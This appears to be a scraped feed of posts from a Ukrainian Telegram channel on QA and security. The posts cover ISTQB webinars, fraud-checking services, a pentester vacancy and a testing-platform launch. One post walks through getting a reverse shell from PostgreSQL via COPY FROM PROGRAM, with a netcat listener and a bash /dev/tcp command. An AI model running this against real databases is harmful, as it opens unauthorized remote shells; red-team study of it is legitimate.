Статистика telegram channel - @qa_security

👨‍💻 Нова ера тест-дизайну та оновлення в ISTQB Advanced Test AnalystЦього року сталася офіційна трансформація погляду на test design techniques! І досить несподівано, що опублікували її в рамках сертифікації ISTQB - Advanced Test Analyst 4.0, бо останні концептуальні зміни були від пана Бейзера, коли більшість з нас ще ходила до школи чи навіть садочку.😮Враження про зміни Олександра Ковальова вже писала для вас в пості зі схемками, які викликали активний відгук читачів. А ми нарешті готові провести на цю тему детальний вебінар - бо вона того заслуговує:ISTQB Test Analyst 4.0: Нова ера Test DesignРозберемося з питаннями✅ Як змінилося бачення black box techniques і що тепер входить до трьох нових категорій?✅ Які техніки з’явилися вперше — CRUD, Metamorphic, Random testing [guided vs adaptive] і не тільки.✅ Як автоматизація дісталася до тест-дизайну і що таке model-based testing?✅ Що ще покриває нова версія Advanced Test Analyst 4.0 і чому її називають найглибшим оновленням за 25 років?✅ Чому defect prevention тепер у компетенціях тестувальника і до чого тут метрики?✅ Організаційні зміни сертифікації: став іспит легшим чи складнішим? Що робити тим, хто вже складав?Організаційне:⏰ 11 грудня (четвер) 19:00 за Києвом🎞Проводиться онлайн, запис відправимо всім зареєстрованим учасникам💫 Участь безкоштовна➡️ДЕТАЛІ ТА РЕЄСТРАЦІЯВелкам пересилати цей анонс своїм колегам та знайомим тестувальникам, щоб було потім з ким все обговорити

🧐 Про ISTQB розвелося стільки міфів і чуток, які часом дивують, а часом навіть веселять, що хочеться розставити всі крапки над і. 🦄 Тож запрошуємо вас на вебінар ”9 міфів про підготовку до ISTQB Foundation Level”, який відбудеться 3 вересня о 19:00.Олександра Ковальова вже 9+ років у тренерстві ISTQB, тож з власного досвіду пояснить:✅ для чого насправді необхідна сертифікація;✅ як до неї підготуватися і на що звертати увагу, щоб не потонути у термінах та нюансах ISTQB;✅ на чому найчастіше ловлять під час сертифікації;✅ деталі складання іспиту в різних країнах та секрети підготовки;✅ які матеріали стануть корисними у підготовці (окрім силабусу, звісно);✅ як набуті знання застосовують на практиці у проєктах.А ще на вебінарі Олександра розповість, наскільки взагалі актуальна сертифікація ISTQB FL на ринку в 2025 році в Україні і за кордоном та який саме профіт дає Foundation Level в залежності від вашого досвіду.🦄 Реєструйтеся і готуйте свої запитання до спікерки! 🦄🕰3 вересня о 19:00🌟Участь безкоштовна, але реєстрація обовʼязкова🎯Деталі та реєстрація: https://bit.ly/4129yjr

Якщо ви працюєте з PostgreSQL, можете спробувати себе частково в ролі Red Team.Для цього вам потрібен користувач із правами pg_execute_server_program. І так, підключаємось до бази:psql -h hostname/ip -p 6543 -U username -d database Перевірямо наявність у поточного користувача потрібних прав або наявність таких користувачів у базі:SELECT rolnameFROM pg_rolesWHERE pg_has_role(rolname, 'pg_execute_server_program', 'member'); або SELECT has_role(current_user, 'pg_execute_server_program', 'member'); Якщо ваш користувач присутній у списку - можна переходити до наступного етапу.Піднімаємо listener (слухача) на хості, що знаходиться в тій самій мережі, що і база даних, або на іншому, якщо дозволяє мережеве оточення:nc -lvnp 4444 Далі запускаємо команду у PostgreSQL:COPY poc_output FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"'; Якщо налаштування прав користувачів у PostgreSQL не обмежують використання COPY FROM PROGRAM або загалом права занадто широкі - ви отримаєте reverse shell від імені того користувача, під яким працює служба PostgreSQL.

Cервіси для перевірки шахраїв. Prom check - перевірка приналежності сайта до платформи prom.ua, щоб не потрапити на фішерів. Вказуйте лінк на сайт.Privatbank Check, Сheck.gov - для перевірки справжності квитанцій про оплату. Перший для Приватбанку, другий для Моно, А-банк тощо. Вказуємо номер квитанції.ЄДЕБО - державний реєстр для перевірки справжності документів про освіту. Вводите серію та номер диплому і отримуєте інформацію про його дійсність чи ні. Працює зі всіма документами, виданими після 2000-ного року.Перевірка недійсних документів від ДМСУ - перевіряйте, чи не викраденим паспортом користується особа при укладенні договору тощо. Wanted MVS - відкриті бази розшуку від МВС. Перевіряйте, чи не внесений телефон або транспортний засіб, який ви маєте бажання придбати до бази викрадених або втрачених. Перевірка свого ІПН - перевіряйте справжність індивідуального податкового номеру (РНОКПП). Якщо номер дійсний, сервіс показує дані про дату народження і стать.Судова влада - перевіряйте, чи має особа судові провадження, в тому числі штрафи, цивільні та кримінальні справи. Також можете перевіряти адвокатів, яких результатів у судах вони добивалися для своїх клієнтів.Реєстр виконавчих проваджень - перевіряйте, чи присутні у особи будь-які борги (відкриті виконавчі провадження). Whois - надає інформацію про сайт. Перевіряйте, чи не фішинговим є сайт, за яким ви перейшли. X-ray contact - перевірка за номером телефону. Знаходить пов'язані номери, перевіряє Getcontact та соціальні мережі. YouControl, OpenDatabot - автоматизована перевірка бізнесу, ФОП, транспортних засобів за ДНЗ та VIN-кодом.

Привіт, знайомий шукає собі пентестера, кому цікаво ось опис і кому писати з приводу вакансіїSenior Penetration TesterЛокація: ЄСЧасовий пояс: CET / CESTАнглійска: Обов’язково розмовна, не нижче В2Overview:As a Senior Penetration Tester, you’ll be responsible for assessing and enhancing the security of our systems, networks, and applications. Through in-depth penetration tests and vulnerability assessments, you’ll work closely with internal teams to identify risks, provide actionable recommendations, and help safeguard critical data. You’ll also manage third-party testing engagements when needed.Key Responsibilities: • Conduct penetration tests across networks, web, and mobile applications. • Collaborate with product teams to understand systems and identify vulnerabilities. • Communicate findings clearly to both technical and non-technical stakeholders. • Produce detailed, actionable reports with remediation guidance. • Work with engineers and developers to implement fixes and improve security. • Coordinate third-party penetration tests when internal resources are limited. • Contribute to improving testing methodologies, tools, and processes. • Stay current on emerging threats and testing techniques.Qualifications: • Bachelor’s degree in Computer Science, Information Security, or related field. • 8+ years of experience in penetration testing and security assessments. • Certifications such as OSCP, GPEN, or equivalent preferred. • Strong experience with tools like Metasploit, Burp Suite, Nmap, Nessus. • Knowledge of operating systems, web technologies, and security protocols. • Scripting skills (e.g., Bash, Python, PowerShell). • Excellent communication and reporting skills.Звертатись в тг @ilyashaptalaСказати що від UTOR

🚀 Я з величезним захопленням оголошую відкриття реєстрації на мій стартап — CYBORG TESTS! 🤖Зустрічайте CyborgTests — революційну платформу, яка поєднує ручні, автоматизовані та AI-тести в єдиний та зручний процес!🔍 Чому саме CyborgTests?🧩 Усі тести в одному місці: Ручні, автоматизовані, AI та кіборг-тести пишуться прямо в коді, тож більше не потрібно окремих систем управління тестами (допобачення TestRail)!🛠️ Є тести, які неможливо повністю автоматизувати? Не біда! Тепер ти можеш автоматизувати все аж до моменту, де автоматизація неможлива (наприклад, перевірка якості відеодзвінків), повністю автоматизуючи всі прекондішини (логін, початок дзвінка тощо).⚙️ Playwright всередині: Використовуй можливості найсучаснішого фреймворку Playwright для надійних і потужних автоматизованих тестів!🤖 AI на повну: Використовуй силу штучного інтелекту, щоб вивести тестування на новий рівень і звільнити тестувальників для більш цікавих та складних сценаріїв!📊 Все в одному звіті: Отримуй єдині звіти, які містять результати всіх видів тестування (ручного, автоматичного, аі і кіборг-тестування), з підтримкою паралельного запуску та шардингу!CyborgTests допомагає QA-командам стати ефективнішими, прибирає зайву роботу та значно прискорює процес випуску релізів!🔗 Дізнавайся більше та реєструйся на ранній доступ тут: https://www.cyborgtests.com/